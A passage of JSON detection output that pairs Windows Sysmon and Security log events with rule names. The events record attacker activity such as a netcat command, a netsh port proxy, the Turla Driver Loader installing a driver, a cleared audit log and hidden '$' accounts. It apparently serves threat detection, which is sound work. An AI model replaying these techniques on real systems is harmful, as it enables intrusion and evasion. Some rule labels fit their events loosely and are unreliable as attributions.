Malware"],"event":{"Event":{"EventData":{"Details":"1.2.3.5/3389","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\PortProxy\\v4tov4\\tcp\\1.2.3.4/8001","UtcTime":"2019-05-23 17:46:05.022"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":1027,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:05.022129Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"C:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-9DC3-5E75-0000-00205F930200","LogonId":"0x2935f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9E06-5E75-0000-00107D541000","ParentProcessId":6088,"ProcessGuid":"747F3D96-9F77-5E75-0000-0010D2E62000","ProcessId":3364,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 05:00:39.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243567,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:39.226538Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-9DBA-5E75-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9F77-5E75-0000-001090F32000","ParentProcessId":2416,"ProcessGuid":"747F3D96-9F7D-5E75-0000-00104E062100","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 05:00:45.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243570,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:45.087155Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\Start","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4859,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.625851Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\ImagePath","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4860,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.645880Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory","Suspect Svchost Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-8DBD-5CEA-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","ParentImage":"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe","ParentProcessGuid":"365ABB72-0FA6-5CEA-0000-0010FEC30A00","ParentProcessId":3884,"ProcessGuid":"365ABB72-0FA7-5CEA-0000-001064C60A00","ProcessId":3908,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-26 04:01:43.557"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:43.567204Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Furutaka.exe dummy2.sys","Company":"UG North","CurrentDirectory":"c:\\Users\\Public\\BYOV\\TDL\\","Description":"Turla Driver Loader","FileVersion":"1.1.5.1904","Hashes":"SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-12FA-5E41-0000-0020171A0300","LogonId":"0x31a17","OriginalFileName":"Furutaka.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1363-5E41-0000-0010356F1500","ParentProcessId":8864,"ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"TurlaDriverLoader","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 08:28:12.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":18762,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.856363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-02-10 08:28:12.870","Image":"c:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\drivers\\VBoxDrv.sys","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":18763,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.876766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18764,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.888628Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\\??\\C:\\Windows\\system32\\drivers\\VBoxDrv.sys","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\ImagePath","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18765,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.899736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18767,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.091460Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"NT Kernel & System","FileVersion":"10.0.17763.973 (WinBuild.160101.0800)","Hashes":"SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ImageLoaded":"C:\\Windows\\System32\\ntoskrnl.exe","OriginalFileName":"ntkrnlmp.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"Microsoft® Windows® Operating System","RuleName":"Supicious image loaded - ntoskrnl","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":18769,"Execution_attributes":{"ProcessID":2728,"ThreadID":3888},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.147582Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":772605,"Execution_attributes":{"ProcessID":5424,"ThreadID":5816},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-23T16:49:41.578692Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x7b186","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-27 10:15:20.376","Image":"c:\\Users\\bouss\\Downloads\\ProcessHerpaderping.exe","ProcessGuid":"00247C92-F3AE-5F97-0000-00106ABA0418","ProcessId":21756,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\samir.exe","UtcTime":"2020-10-27 10:17:18.369"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2246491,"Execution_attributes":{"ProcessID":5400,"ThreadID":6548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-27T10:17:18.369342Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["In-memory PowerShell"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"System.Management.Automation","FileVersion":"6.1.7601.17514","Hashes":"SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000","Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4b93b6bd71723bed2fa9dd778436dd5e\\System.Management.Automation.ni.dll","ProcessGuid":"365ABB72-3D1B-5CE0-0000-0010C3840B00","ProcessId":2840,"Product":"Microsoft (R) Windows (R) Operating System","RuleName":"Defense Evasion - Unmanaged PowerShell Detected","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-05-18 17:16:18.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":18732,"Execution_attributes":{"ProcessID":1940,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:16:18.833171Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107103","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769629,"Execution_attributes":{"ProcessID":584,"ThreadID":752},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:31:19.133272Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107104","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769634,"Execution_attributes":{"ProcessID":584,"ThreadID":640},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:32:13.647155Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.526","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\install.bat","UtcTime":"2019-03-17 20:17:44.526"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5252,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.537011Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.607","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPCheck.exe","UtcTime":"2019-03-17 20:17:44.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5253,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.637155Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.777","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPConf.exe","UtcTime":"2019-03-17 20:17:44.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5254,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.797385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.458","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPWInst.exe","UtcTime":"2019-03-17 20:17:45.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5255,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.478364Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.618","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\uninstall.bat","UtcTime":"2019-03-17 20:17:45.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5256,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.628580Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.648","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\update.bat","UtcTime":"2019-03-17 